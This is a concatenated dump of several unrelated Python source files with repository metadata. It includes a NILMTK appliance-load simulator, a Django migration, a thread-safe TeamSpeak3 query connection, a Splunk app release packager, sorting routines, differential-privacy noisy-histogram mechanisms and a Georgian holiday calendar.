"MIT"
] | 5
|
2021-04-17T14:02:58.000Z
|
2022-03-06T02:18:16.000Z
|
examples/random_article.py
|
yusufusta/wikiHowUnofficialAPI
|
e29ae96a2dcf893f5b587804b9dd37a412cdd561
|
[
"MIT"
] | 1
|
2021-07-09T12:28:27.000Z
|
2021-07-10T10:04:11.000Z
|
examples/random_article.py
|
yusufusta/wikiHowUnofficialAPI
|
e29ae96a2dcf893f5b587804b9dd37a412cdd561
|
[
"MIT"
] | 4
|
2021-02-02T14:23:58.000Z
|
2021-11-15T04:38:10.000Z
|
import wikihowunofficialapi as wha
ra = wha.random_article()
print(ra)
| 14.4
| 34
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
8b9488221b16161dd9b114f9406bbcd8771818fb
| 11,341
|
py
|
Python
|
nilmtk/simulate/gaussianstatemachines.py
|
BaluJr/energytk
|
e9b06bcb43a40010ccc40a534a7067ee520fb3a7
|
[
"Apache-2.0"
] | 3
|
2018-11-09T16:13:32.000Z
|
2019-11-10T20:10:10.000Z
|
nilmtk/simulate/gaussianstatemachines.py
|
BaluJr/energytk
|
e9b06bcb43a40010ccc40a534a7067ee520fb3a7
|
[
"Apache-2.0"
] | null | null | null |
nilmtk/simulate/gaussianstatemachines.py
|
BaluJr/energytk
|
e9b06bcb43a40010ccc40a534a7067ee520fb3a7
|
[
"Apache-2.0"
] | 1
|
2018-10-24T10:28:52.000Z
|
2018-10-24T10:28:52.000Z
|
import numpy as np
import pandas as pd
from nilmtk import TimeFrame
import datetime
import matplotlib.pyplot as plt
# transients['active transition'].cumsum().resample('2s', how='ffill').plot()
class GaussianStateMachines(object):
"""
This class is a basic simulator, which creates sample loads by randomizing signatures
of some predefined statemachine appliances.
The randomization is performed by a perfect gaussian distribution, whose stddev can be
defined.
The signatures of all the appliances are superimposed to yield a final load profile.
"""
def simulate(self, output_datastore, appliance_specs = None, duration = 8640000, seed = None):
'''
Performs the simulation of a defined interval of load profile.
The style of the output is heavily linked to the EventbasedCombination
disaggregator.
The target file is filled with submeters for each appliance and a single
site_meter.
Parameters
----------
appliance_specs:
The specification of the appliances. See the default appliances
created in the constructor to have a description of the default
format
target_file: str
The path to the file where the powerflow shall be created.
duration: pd.Timedelta
Circa duration of the created load profile.
Default 100 days
seed: int
The seed number used within the random generation. This allows to
genrate the same load profile multiple times. If kept None,
random seed is used.
Returns
-------
transients: pd.DataFrame
The transients of the load profile
steady_states: pd.DataFrame
The steady states of the load profile
'''
np.random.seed(seed=seed)
specs =[[((2000, 20, 15), (20, 6, 10)), ((-2000, 10, 15), (10, 3, 10))], # Heater 1
[((1500, 40, 15), (10, 6, 10)), ((-1500, 10, 15), (10, 2, 10))], # Heater 2
[((130, 10, 90), (10, 5, 30)), ((-130, 10, 300), (10, 6, 50))], # Fridge
[((80, 0, 4*60*60),(10, 0.01, 60*60*2)), ((-80, 0.0, 10),(10, 0.01, 10))], # Lamp
[((40, 0, 50), (6, 2, 10)), ((120, 0, 40), (15, 2, 10)), ((-160, 10, 200), (10, 1, 30))], # Complex1
[((100, 0, 10*60), (10, 0.1, 80)), ((-26, 0, 180), (5, 0.1, 50)), ((-74,5, 480), (15,1,50))], # Complex2
[((320, 0, 60*2), (10, 3, 10)), ((-40, 0, 180), (5, 0.1, 50)), ((-100,5, 480), (15,1,50)), ((-180,5, 480), (15,1,50))]] # Complex3
# Breaks as appearances, break duration in Minutes, stddev
break_spec = [[5, 300, 10], [4, 600, 10], [7, 2*60,10], [1, 60*12, 180], [4, 60, 10], [2, 60, 10], [2, 60*6, 60*60]]
#for i, bs in enumerate(break_spec):
# bs[0] = bs[0]*len(specs[i])
appliance_names = ['Heater1', 'Heater2', 'Fridge', 'Lamp', 'Complex 1', 'Complex 2', "Complex 3"]
# Generate powerflow for each appliance
appliances = []
for i, spec in enumerate(specs):
avg_activation_duration = sum(map(lambda e: e[0][-1], spec))
avg_batch_duration = avg_activation_duration * break_spec[i][0] + (break_spec[i][1]*60)
num_batches = duration // avg_batch_duration
activations_per_batch = break_spec[i][0]
events_per_batch = len(spec) * activations_per_batch
flags = []
for flag_spec in spec:
flags.append(np.random.normal(flag_spec[0], flag_spec[1], (num_batches * activations_per_batch, 3)))
flags = np.hstack(flags)
# Take care that fits exactly to 5
cumsum = flags[:,:-3:3].cumsum(axis=1) # 2d vorrausgesetzt np.add.accumulate
flags[:,:-3:3][cumsum < 5] += 5 - cumsum[cumsum < 5]
flags[:,-3] = -flags[:,:-3:3].sum(axis=1) # 2d vorrausgesetzt
flags = flags.reshape((-1,3))
# Put appliance to the input format
appliance = pd.DataFrame(flags, columns=['active transition', 'spike', 'starts'])
num_batches_exact = len(appliance)//events_per_batch
breaks = np.random.normal(break_spec[i][1],break_spec[i][2], num_batches_exact)
appliance.loc[events_per_batch-1::events_per_batch,'starts'] += (breaks * 60)#num_breaks*break_spec[i][0]
appliance.index = pd.DatetimeIndex(appliance['starts'].clip(lower=5).shift().fillna(i).cumsum()*1e9, tz='utc')
appliance['ends'] = appliance.index + pd.Timedelta('1s') # Werden eh nicht benutzt, muss kuerzer sein als der clip
appliance.drop(columns=['starts'], inplace=True)
appliance.loc[appliance['active transition'] < 0, 'signature'] = appliance['active transition'] - appliance['spike']
appliance.loc[appliance['active transition'] >= 0, 'signature'] = appliance['active transition'] + appliance['spike']
appliance['original_appliance'] = i
appliances.append(appliance[:])
# Create the overall powerflow as mixture of single appliances
transients = pd.concat(appliances, verify_integrity = True)
transients = transients.sort_index()
# Write into file
building_path = '/building{}'.format(1)
for appliance in range(len(appliances)):
key = '{}/elec/meter{:d}'.format(building_path, appliance + 2)
data = appliances[appliance]['active transition'].append(pd.Series(0, name='power active', index=appliances[appliance]['active transition'].index - pd.Timedelta('0.5sec')))
data = pd.DataFrame(data.sort_index().cumsum())
data.columns = pd.MultiIndex.from_tuples([('power', 'active')], names=['physical_quantity', 'type'])
output_datastore.append(key, data)
overall = transients['active transition'].append(pd.Series(0, name='power active', index=transients['active transition'].index - pd.Timedelta('0.5sec')))
overall = pd.DataFrame(overall.sort_index().cumsum())
overall.columns = pd.MultiIndex.from_tuples([('power', 'active')], names=['physical_quantity', 'type'])
output_datastore.append('{}/elec/meter{:d}'.format(building_path, 1), overall)
num_meters = len(appliances) + 1
# Write the metadata
timeframe = TimeFrame(start = transients.index[0], end = transients.index[-1])
self._save_metadata_for_disaggregation(output_datastore, timeframe, num_meters, appliance_names)
# The immediate result
steady_states = transients[['active transition']].cumsum().rename(columns={'active transition':'active average'})
steady_states[['active average']] += 60
transients = transients[['active transition', 'spike', 'signature', 'ends']]
return transients, steady_states
def _save_metadata_for_disaggregation(self, output_datastore, timeframe, num_meters, appliancetypes):
"""
Stores the metadata within the storage.
REMINDER: Also urpruenglich wollte ich das anders machen und eben auch die Metadatan mit abspeichern.
Habe ich aus zeitgruenden dann gelassen und mache es doch so wie es vorher war.
This function first checks whether there are already metainformation in the file.
If zes, it extends them and otherwise it removes them.
Note that `self.MODEL_NAME` needs to be set to a string before
calling this method. For example, we use `self.MODEL_NAME = 'CO'`
for Combinatorial Optimisation.
TODO:`preprocessing_applied` for all meters
TODO: submeter measurement should probably be the mains
measurement we used to train on, not the mains measurement.
Parameters
----------
output_datastore : nilmtk.DataStore subclass object
The datastore to write metadata into.
timeframe : list of nilmtk.TimeFrames or nilmtk.TimeFrameGroup
The TimeFrames over which this data is valid for.
num_meters : [int]
Required if `supervised=False`, Gives for each phase amount of meters
appliancetypes: [str]
The names for the different appliances. Is used in plots and error metric
tables.
"""
# Global metadata
meter_devices = {
'synthetic' : {
'model': "Synth",
'sample_period': 0, # Makes it possible to use special load functionality
'max_sample_period': 1,
'measurements': [{
'physical_quantity': 'power',
'type': 'active'
}]
}}
date_now = datetime.datetime.now().isoformat().split('.')[0]
dataset_metadata = {
'name': "Synthetic Gaussian Statemachine",
'date': date_now,
'meter_devices': meter_devices,
'timeframe': timeframe.to_dict()
}
output_datastore.save_metadata('/', dataset_metadata)
# Building metadata always stored for the new buildings
phase_building = 1
building_path = '/building{}'.format(phase_building)
mains_data_location = building_path + '/elec/meter1'
# Main meter is sum of all single appliances:
elec_meters = {}
elec_meters[1] = {
'device_model': 'synthetic',
'site_meter': True,
'data_location': mains_data_location,
'preprocessing_applied': {}, # TODO
'statistics': {
'timeframe': timeframe.to_dict()
}
}
def update_elec_meters(meter_instance):
elec_meters.update({
meter_instance: {
'device_model': 'synthetic', # self.MODEL_NAME,
'submeter_of': 1,
'data_location': (
'{}/elec/meter{}'.format(
building_path, meter_instance)),
'preprocessing_applied': {}, # TODO
'statistics': {
'timeframe': timeframe.to_dict()
}
}
})
# Appliances and submeters:
appliances = []
# Submeters (Starts at 2 because meter 1 is mains and 0 not existing)
for chan in range(2, num_meters):
update_elec_meters(meter_instance=chan)
appliance = {
'original_name': appliancetypes[chan-2],
'meters': [chan],
'type': appliancetypes[chan-2],
'instance': chan - 1
}
appliances.append(appliance)
building_metadata = {
'instance': (phase_building),
'elec_meters': elec_meters,
'appliances': appliances,
}
output_datastore.save_metadata(building_path, building_metadata)
| 49.308696
| 184
| 0.571907
| 11,139
| 0.982189
| 0
| 0
| 0
| 0
| 0
| 0
| 4,906
| 0.43259
|
8b95a94d3b25a23a56d3d3d661b084a44e828fab
| 543
|
py
|
Python
|
my_gallery/migrations/0006_photos_image.py
|
Abdihakim-Muhumed/gallery
|
bfdb58466503bedda6ac4b686afb42b69c055f0c
|
[
"Unlicense"
] | null | null | null |
my_gallery/migrations/0006_photos_image.py
|
Abdihakim-Muhumed/gallery
|
bfdb58466503bedda6ac4b686afb42b69c055f0c
|
[
"Unlicense"
] | null | null | null |
my_gallery/migrations/0006_photos_image.py
|
Abdihakim-Muhumed/gallery
|
bfdb58466503bedda6ac4b686afb42b69c055f0c
|
[
"Unlicense"
] | null | null | null |
# Generated by Django 3.1.2 on 2020-10-14 07:15
import cloudinary.models
from django.db import migrations
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('my_gallery', '0005_auto_20201013_0828'),
]
operations = [
migrations.AddField(
model_name='photos',
name='image',
field=cloudinary.models.CloudinaryField(default=django.utils.timezone.now, max_length=255, verbose_name='image'),
preserve_default=False,
),
]
| 24.681818
| 125
| 0.655617
| 404
| 0.744015
| 0
| 0
| 0
| 0
| 0
| 0
| 106
| 0.195212
|
8b98b8d35fd76526fa88fe1c8a30101c9a8baac3
| 9,713
|
py
|
Python
|
bot/ts/ThreadSafeTSConnection.py
|
Asnanon/ts-gw2-verifyBot
|
4da70450bc53631e61a42d18df36f5aef710cdbe
|
[
"MIT"
] | null | null | null |
bot/ts/ThreadSafeTSConnection.py
|
Asnanon/ts-gw2-verifyBot
|
4da70450bc53631e61a42d18df36f5aef710cdbe
|
[
"MIT"
] | null | null | null |
bot/ts/ThreadSafeTSConnection.py
|
Asnanon/ts-gw2-verifyBot
|
4da70450bc53631e61a42d18df36f5aef710cdbe
|
[
"MIT"
] | null | null | null |
import logging
from threading import RLock
from typing import Callable, Tuple, TypeVar
import schedule
import ts3
from ts3.query import TS3ServerConnection
from bot.config import Config
LOG = logging.getLogger(__name__)
R = TypeVar('R')
def default_exception_handler(ex):
""" prints the trace and returns the exception for further inspection """
LOG.debug("Exception caught in default_exception_handler: ", exc_info=ex)
return ex
def signal_exception_handler(ex):
""" returns the exception without printing it, useful for expected exceptions, signaling that an exception occurred """
return ex
def ignore_exception_handler(ex):
""" acts as if no exception was raised, equivalent to except: pass"""
return None
class ThreadSafeTSConnection:
RETRIES = 3
@property
def uri(self):
return "telnet://%s:%s@%s:%s" % (self._user, self._password, self._host, str(self._port))
def __init__(self, user, password, host, port, keepalive_interval=None, server_id=None, bot_nickname=None):
"""
Creates a new threadsafe TS3 connection.
user: user to connect as
password: password to connect to user with
host: host of TS3 server
port: port for server queries
keepalive_interval: interval in which the keepalive is sent to the ts3 server
server_id: the server id of the TS3 server we want to address, in case we have multiple.
Note that the server id HAS to be selected at some point, using the "use" command.
It has just been wrapped in here to allow for more convenient copying of the
TS3 connection where the appropriate server is selected automatically.
bot_nickname: nickname for the bot. Could be suffixed, see gentleRename. If None is passed,
no naming will take place.
"""
self._user = user
self._password = password
self._host = host
self._port = port
self._keepalive_interval = int(keepalive_interval)
self._server_id = server_id
self._bot_nickname = bot_nickname + '-' + str(id(self))
self.lock = RLock()
self.ts_connection = None # done in init()
self._keepalive_job = None
self.init()
def init(self):
if self.ts_connection is not None:
try:
self.ts_connection.close()
except Exception:
pass # may already be closed, doesn't matter.
self.ts_connection = ts3.query.TS3ServerConnection(self.uri)
# This hack allows using the "quit" command, so the bot does not appear as "timed out" in the Ts3 Client & Server log
self.ts_connection.COMMAND_SET = set(self.ts_connection.COMMAND_SET) # creat copy of frozenset
self.ts_connection.COMMAND_SET.add('quit') # add command
if self._keepalive_interval is not None:
if self._keepalive_job is not None:
schedule.cancel_job(self._keepalive_job) # to avoid accumulating keepalive calls during re-inits
self._keepalive_job = schedule.every(self._keepalive_interval).seconds.do(self.keepalive)
if self._server_id is not None:
self.ts3exec(lambda tc: tc.exec_("use", sid=self._server_id))
if self._bot_nickname is not None:
self.forceRename(self._bot_nickname)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close()
return None
def keepalive(self):
LOG.info(f"Keepalive Ts Connection {self._bot_nickname}")
self.ts3exec(lambda tc: tc.send_keepalive())
def ts3exec(self,
handler: Callable[[TS3ServerConnection], R],
exception_handler=lambda ex: default_exception_handler(ex)) -> Tuple[R, Exception]: # eh = lambda ex: print(ex)):
"""
Excecutes a query() or exec_() on the internal TS3 connection.
handler: a function ts3.query.TS3ServerConnection -> any
exception_handler: a function Exception -> any. None will be interpreted as not having encountered an exception.
The default handler prints the stacktrace for the exception and returns the exception itself.
This changes the workflow of executing erroring code: instead of try-catching we need to
decompose the tuple returned from this function and check if the exception result is anything
but None. E.g.:
try:
res = ts3con.query(...)
except Exception as ex:
# error handling
becomes
res,ex = threadsafe_ts3con.ts3exec(lambda tc: tc.query(...))
if ex:
# error handling
Note that the exception handler is only executed iff an exception is actually
being handled!
returns a tuple with the results of the two handlers (result first, exception result second).
"""
reinit = False
with self.lock:
failed = True
fails = 0
res = None
exres = None
while failed and fails < ThreadSafeTSConnection.RETRIES:
failed = False
try:
res = handler(self.ts_connection)
except ts3.query.TS3TransportError:
failed = True
fails += 1
LOG.error("Critical error on transport level! Attempt %s to restart the connection and send the command again.", str(fails), )
reinit = True
except Exception as ex:
exres = exception_handler(ex)
if reinit:
self.init()
return res, exres
def close(self):
if self._keepalive_job is not None:
schedule.cancel_job(self._keepalive_job)
# This hack allows using the "quit" command, so the bot does not appear as "timed out" in the Ts3 Client & Server log
if self.ts_connection is not None:
self.ts_connection.exec_("quit") # send quit
self.ts_connection.close() # immediately quit
del self.ts_connection
def gentleRename(self, nickname):
"""
Renames self to nickname, but attaches a running counter
to the name if the nickname is already taken.
"""
i = 1
new_nick = "%s(%d)" % (nickname, i)
while not self.ts3exec(lambda tc: tc.query("clientfind", pattern=new_nick).first(), signal_exception_handler)[1]:
i += 1
new_nick = "%s(%d)" % (nickname, i)
new_nick = "%s(%d)" % (nickname, i)
self.ts3exec(lambda tc: tc.exec_("clientupdate", client_nickname=new_nick))
self._bot_nickname = new_nick
return self._bot_nickname
def forceRename(self, target_nickname):
"""
Attempts to forcefully rename self.
If the chosen nickname is already taken, the bot will attempt to kick that user.
If that fails the bot will fall back to gentle renaming itself.
"""
whoami_response, _ = self.ts3exec(lambda tc: tc.query("whoami").first())
imposter, error = self.ts3exec(lambda tc: tc.query("clientfind", pattern=target_nickname).first(), signal_exception_handler) # check if nickname is already in use
if whoami_response['client_nickname'] != target_nickname:
if error:
if error.resp.error.get('id') == '512': # no result
self.ts3exec(lambda tc: tc.exec_("clientupdate", client_nickname=target_nickname))
LOG.info("Forcefully renamed self to '%s'.", target_nickname)
else:
LOG.error("Error on rename when searching for users", exc_info=error)
else:
if whoami_response['client_id'] != imposter['clid']:
_, ex = self.ts3exec(lambda tc: tc.exec_("clientkick", reasonid=5, reasonmsg="Reserved Nickname", clid=imposter.get("clid")), signal_exception_handler)
if ex:
LOG.warning(
"Renaming self to '%s' after kicking existing user with reserved name failed."
" Warning: this usually only happens for serverquery logins, meaning you are running multiple bots or you"
" are having stale logins from crashed bot instances on your server. Only restarts can solve the latter.",
target_nickname)
else:
LOG.info("Kicked user who was using the reserved registration bot name '%s'.", target_nickname)
target_nickname = self.gentleRename(target_nickname)
LOG.info("Renamed self to '%s'.", target_nickname)
else:
self.ts3exec(lambda tc: tc.exec_("clientupdate", client_nickname=target_nickname))
else:
LOG.info("No rename necessary")
self._bot_nickname = target_nickname
return self._bot_nickname
def create_connection(config: Config, nickname: str) -> ThreadSafeTSConnection:
return ThreadSafeTSConnection(config.user, config.passwd,
config.host, config.port,
config.keepalive_interval,
config.server_id,
nickname)
| 45.176744
| 171
| 0.601153
| 8,601
| 0.885514
| 0
| 0
| 126
| 0.012972
| 0
| 0
| 4,164
| 0.428704
|
8b9915ff298534b2c620ead53ddd94b9a9c59202
| 87
|
py
|
Python
|
software/reachy/io/__init__.py
|
pollen-robotics/reachy-2.0
|
1721c2d93737e576e328bfdb78376d1b0163d3d6
|
[
"Apache-1.1"
] | 167
|
2018-02-07T21:42:13.000Z
|
2021-03-06T08:25:45.000Z
|
software/reachy/io/__init__.py
|
pollen-robotics/reachy-2.0
|
1721c2d93737e576e328bfdb78376d1b0163d3d6
|
[
"Apache-1.1"
] | 39
|
2019-11-27T13:11:59.000Z
|
2021-01-12T09:33:26.000Z
|
software/reachy/io/__init__.py
|
pollen-robotics/reachy-2.0
|
1721c2d93737e576e328bfdb78376d1b0163d3d6
|
[
"Apache-1.1"
] | 47
|
2018-05-27T02:59:28.000Z
|
2021-03-07T14:56:10.000Z
|
"""Reachy submodule responsible for low-level IO."""
from .io import IO # noqa F401
| 17.4
| 52
| 0.701149
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 63
| 0.724138
|
8ba05404268d52ee6b9dcf341a6f596fdbe8cb19
| 453
|
py
|
Python
|
test/unit/test_wrapper.py
|
Bowowzahoya/cordis_search
|
8766717fdd785b2768785b9147e63cac62dfbd43
|
[
"MIT"
] | null | null | null |
test/unit/test_wrapper.py
|
Bowowzahoya/cordis_search
|
8766717fdd785b2768785b9147e63cac62dfbd43
|
[
"MIT"
] | null | null | null |
test/unit/test_wrapper.py
|
Bowowzahoya/cordis_search
|
8766717fdd785b2768785b9147e63cac62dfbd43
|
[
"MIT"
] | null | null | null |
import pandas as pd
from context import *
from cordis_search import wrapper as wr
TEST_PROJECTS_FILE = pd.read_csv(RESOURCES_FOLDER+"fp7_test_projects.csv", sep=";")
print(TEST_PROJECTS_FILE)
def test_search():
query = "multiculturalism"
selected_projects = wr.search(TEST_PROJECTS_FILE, query)
assert set(selected_projects.index.to_list()) == set([267583, 287711])
def test_summary():
wr.summary(TEST_PROJECTS_FILE)
test_summary()
| 25.166667
| 83
| 0.766004
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 44
| 0.09713
|
8ba0eaca96c9b2d167fd14d08ba774e477aea1cb
| 1,067
|
py
|
Python
|
dpsniper/mechanisms/noisy_hist.py
|
barryZZJ/dp-sniper
|
71a3fc06f3fc319b023bde9aad8f05b8c5a47a80
|
[
"MIT"
] | 13
|
2021-03-30T15:39:35.000Z
|
2022-02-21T08:30:45.000Z
|
dpsniper/mechanisms/noisy_hist.py
|
barryZZJ/dp-sniper
|
71a3fc06f3fc319b023bde9aad8f05b8c5a47a80
|
[
"MIT"
] | null | null | null |
dpsniper/mechanisms/noisy_hist.py
|
barryZZJ/dp-sniper
|
71a3fc06f3fc319b023bde9aad8f05b8c5a47a80
|
[
"MIT"
] | 4
|
2021-06-30T08:37:45.000Z
|
2022-03-05T03:21:14.000Z
|
import numpy as np
from dpsniper.mechanisms.abstract import Mechanism
class NoisyHist1(Mechanism):
"""
Alg. 9 from:
Zeyu Ding, YuxinWang, GuanhongWang, Danfeng Zhang, and Daniel Kifer. 2018.
Detecting Violations of Differential Privacy. CCS 2018.
"""
def __init__(self, eps: float = 0.1):
self.eps = eps
def m(self, a, n_samples: int = 1):
l = a.shape[0]
v = np.atleast_2d(a)
# each row in m is one sample
m = v + np.random.laplace(scale=1/self.eps, size=(n_samples, l))
return m
class NoisyHist2(Mechanism):
"""
Alg. 10 from:
Zeyu Ding, YuxinWang, GuanhongWang, Danfeng Zhang, and Daniel Kifer. 2018.
Detecting Violations of Differential Privacy. CCS 2018.
"""
def __init__(self, eps: float = 0.1):
self.eps = eps
def m(self, a, n_samples: int = 1):
l = a.shape[0]
v = np.atleast_2d(a)
# each row in m is one sample
m = v + np.random.laplace(scale=self.eps, size=(n_samples, l))
return m
| 26.02439
| 82
| 0.597938
| 991
| 0.928772
| 0
| 0
| 0
| 0
| 0
| 0
| 409
| 0.383318
|
8ba24d39fccf745cf193a9313e6f0347c33e72ba
| 1,122
|
py
|
Python
|
workalendar/europe/georgia.py
|
macharmi/workalendar
|
4f8644484d6ba56c66e4bb82c377aa19eccfc0dc
|
[
"MIT"
] | null | null | null |
workalendar/europe/georgia.py
|
macharmi/workalendar
|
4f8644484d6ba56c66e4bb82c377aa19eccfc0dc
|
[
"MIT"
] | null | null | null |
workalendar/europe/georgia.py
|
macharmi/workalendar
|
4f8644484d6ba56c66e4bb82c377aa19eccfc0dc
|
[
"MIT"
] | null | null | null |
from ..core import OrthodoxCalendar
from ..registry_tools import iso_register
@iso_register('GE')
class Georgia(OrthodoxCalendar):
'Country of Georgia'
"Sources: "
"https://en.wikipedia.org/wiki/Public_holidays_in_Georgia_(country)"
"https://www.officeholidays.com/countries/georgia/2021"
include_christmas = False
include_christmas_eve = False
include_new_years_day = True
include_orthodox_christmas = True
include_epiphany = False
include_good_friday = True
include_easter_saturday = True
include_easter_sunday = True
include_easter_monday = True
FIXED_HOLIDAYS = OrthodoxCalendar.FIXED_HOLIDAYS + (
(1, 2, "Day After New Year"),
(1, 19, "Orthodox Epiphany"),
(3, 3, "Mother's Day"),
(3, 8, "International Women's Day"),
(4, 9, "Day Of National Unity"),
(5, 9, "Day Of Victory Over Fascism"),
(5, 12, "Saint Andrew The First-Called Day"),
(5, 26, "Independence Day"),
(8, 28, "Saint Mary's Day"),
(10, 14, "Day Of Svetitskovloba"),
(11, 23, "Saint George's Day"),
)
| 30.324324
| 72
| 0.646168
| 1,021
| 0.909982
| 0
| 0
| 1,041
| 0.927807
| 0
| 0
| 404
| 0.360071
|
8ba29d9fb01d60102507bf5db6c09210143677fa
| 3,471
|
py
|
Python
|
release/util/splunkbase_releaser.py
|
xynazog/amp4e_splunk_events_input
|
a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b
|
[
"BSD-2-Clause"
] | 9
|
2017-07-31T16:13:51.000Z
|
2021-01-06T15:02:36.000Z
|
release/util/splunkbase_releaser.py
|
xynazog/amp4e_splunk_events_input
|
a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b
|
[
"BSD-2-Clause"
] | 51
|
2017-10-24T17:25:44.000Z
|
2022-03-31T16:47:58.000Z
|
release/util/splunkbase_releaser.py
|
xynazog/amp4e_splunk_events_input
|
a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b
|
[
"BSD-2-Clause"
] | 12
|
2017-08-01T08:59:39.000Z
|
2021-02-24T21:10:46.000Z
|
import os
from distutils.dir_util import copy_tree
from invoke import task, run
import shutil
class SplunkbaseReleaser:
DIRS_TO_ARCHIVE = ['appserver', 'bin', 'certs', 'default', 'metadata', 'README', 'static']
APP_NAME = 'amp4e_events_input'
PATH_TO_PYTHON_LIBS = '/opt/splunk/lib/python3.7/site-packages'
PYTHON_LIBS_TO_ARCHIVE = ['splunklib', 'pika']
EXCLUDED_FILES = ['local.meta', 'requirements-splunk.txt', '*.pyc', '*.pyo']
SPLUNKBASE_README = 'README_SPLUNKBASE.md'
LICENSE = 'LICENSE'
def __init__(self, app_dir):
print(app_dir);
self.app_dir = app_dir
@property
def _tmp_dir(self):
return os.path.join('/tmp')
@property
def _tmp_app_dir(self):
return os.path.join(self._tmp_dir, self.APP_NAME)
@property
def _readme_splunkbase_path(self):
return os.path.join(self.app_dir, self.SPLUNKBASE_README)
@property
def _license_path(self):
return os.path.join(self.app_dir, self.LICENSE)
@property
def _excluded_files_arguments(self):
return ' '.join(map(lambda f: "--exclude='{}'".format(f), self.EXCLUDED_FILES))
@property
def _release_file_path(self):
return os.path.join(self.app_dir, 'release', '{}.spl'.format(self.APP_NAME))
def __call__(self):
self.prepare()
self.copy_dirs()
self.copy_python_libs()
self.make_bin_dir_executable()
self.copy_splunk_readme()
self.copy_license()
self.create_archive()
self._remove_tmp_app_dir()
def prepare(self):
self._remove_tmp_app_dir()
self._remove_release_file()
self._create_tmp_app_dir()
def copy_python_libs(self):
for l in self.PYTHON_LIBS_TO_ARCHIVE:
dest_dir = os.path.join(self._tmp_app_dir, 'bin', l)
if os.path.isdir(dest_dir):
invoke.Exit('The directory {} already exists and conflicts with a native Python package. ' \
'Please rename or delete it.'.format(dest_dir))
else:
copy_tree(os.path.join(self.PATH_TO_PYTHON_LIBS, l), dest_dir)
def make_bin_dir_executable(self):
for root, dirs, files in os.walk(os.path.join(self._tmp_app_dir, 'bin')):
for f in files:
os.chmod(os.path.join(root, f), 0o755)
for d in dirs:
os.chmod(os.path.join(root, d), 0o755)
def create_archive(self):
print("CREATING FILE")
run("tar -czf {} {} -C {} {}"
.format(self._release_file_path, self._excluded_files_arguments, self._tmp_dir, self.APP_NAME))
def _remove_release_file(self):
if os.path.exists(self._release_file_path):
os.remove(self._release_file_path)
def copy_dirs(self):
for d in self.DIRS_TO_ARCHIVE:
copy_tree(os.path.join(self.app_dir, d), os.path.join(self._tmp_app_dir, d))
def copy_splunk_readme(self, dest_file='README.md'):
shutil.copyfile(self._readme_splunkbase_path, os.path.join(self._tmp_app_dir, dest_file))
def copy_license(self):
shutil.copyfile(self._license_path, os.path.join(self._tmp_app_dir, self.LICENSE))
def _remove_tmp_app_dir(self):
if os.path.isdir(self._tmp_app_dir):
shutil.rmtree(self._tmp_app_dir)
def _create_tmp_app_dir(self):
if not os.path.isdir(self._tmp_app_dir):
os.makedirs(self._tmp_app_dir)
| 34.71
| 109
| 0.645923
| 3,375
| 0.972342
| 0
| 0
| 638
| 0.183809
| 0
| 0
| 428
| 0.123307
|
8ba46c9ce685361335be0d77dfae9a2dd018991f
| 2,502
|
py
|
Python
|
sorts.py
|
zhangxl97/leetcode
|
aa94228eba86d761ce5c9b6bfb8b2015c1629074
|
[
"MIT"
] | 1
|
2020-09-12T10:35:22.000Z
|
2020-09-12T10:35:22.000Z
|
sorts.py
|
zhangxl97/leetcode
|
aa94228eba86d761ce5c9b6bfb8b2015c1629074
|
[
"MIT"
] | null | null | null |
sorts.py
|
zhangxl97/leetcode
|
aa94228eba86d761ce5c9b6bfb8b2015c1629074
|
[
"MIT"
] | null | null | null |
from typing import List
class sort:
def quick(self, nums:List[int]) -> List[int]:
if len(nums) >= 2:
base = nums[-1] # 选取基准值,可以为任何值
left, right = [], []
nums = nums[:-1]
for num in nums:
if num >= base: # 大于等于基准值的数存于right
right.append(num)
else: # 小于基准值的数存于left
left.append(num)
# print(left, '\t', base, '\t', right)
return self.quick(left) + [base] + self.quick(right)
else:
return nums
def quick_sort(self, nums: list, left: int, right: int) -> None:
if left < right:
i = left
j = right
# 取第一个元素为枢轴量
pivot = nums[left]
while i != j:
# 交替扫描和交换
# 从右往左找到第一个比枢轴量小的元素,交换位置
while j > i and nums[j] > pivot:
j -= 1
if j > i:
# 如果找到了,进行元素交换
# nums[i], nums[j] = nums[j], nums[i]
# break
nums[i] = nums[j]
i += 1
# 从左往右找到第一个比枢轴量大的元素,交换位置
while i < j and nums[i] < pivot:
i += 1
if i < j:
nums[j] = nums[i]
j -= 1
# 至此完成一趟快速排序,枢轴量的位置已经确定好了,就在i位置上(i和j)值相等
nums[i] = pivot
print(nums)
# 以i为枢轴进行子序列元素交换
self.quick_sort(nums, left, j-1)
self.quick_sort(nums, j+1, right)
def merge(self, a, b):
c = []
h = j = 0
while j < len(a) and h < len(b):
if a[j] < b[h]:
c.append(a[j])
j += 1
else:
c.append(b[h])
h += 1
if j == len(a):
for i in b[h:]:
c.append(i)
else:
for i in a[j:]:
c.append(i)
return c
def merge_sort(self, lists):
if len(lists) <= 1:
return lists
middle = len(lists)//2
left = self.merge_sort(lists[:middle])
right = self.merge_sort(lists[middle:])
return self.merge(left, right)
def main():
s = sort()
array = [2,3,5,1,1,4,6,15]
# array = [4,1,2,3,5]
print(array)
# print(s.merge_sort(array))
s.quick_sort(array, 0, len(array)-1)
print(array)
if __name__ == "__main__":
main()
| 26.617021
| 68
| 0.406475
| 2,536
| 0.903778
| 0
| 0
| 0
| 0
| 0
| 0
| 632
| 0.225232
|
8ba6b11d7fb6854358fc0d437c22f1ff827b55c0
| 6,622
|
py
|
Python
|
energy_consumption_lstm/data/model.py
|
DiarmuidKelly/predictors
|
9087302ab3cc54463807b0777f341b575a8fcc90
|
[
"MIT"
] | null | null | null |
energy_consumption_lstm/data/model.py
|
DiarmuidKelly/predictors
|
9087302ab3cc54463807b0777f341b575a8fcc90
|
[
"MIT"
] | null | null | null |
energy_consumption_lstm/data/model.py
|
DiarmuidKelly/predictors
|
9087302ab3cc54463807b0777f341b575a8fcc90
|
[
"MIT"
] | null | null | null |
import datetime as dt
import numpy as np
def calculate_ranges(dataset):
arr = np.array(dataset)
mean = np.mean(arr, axis=0)
min = np.min(arr, axis=0)
max = np.max(arr, axis=0)
ranges = np.array((min, mean, max)).T
return ranges
class Record:
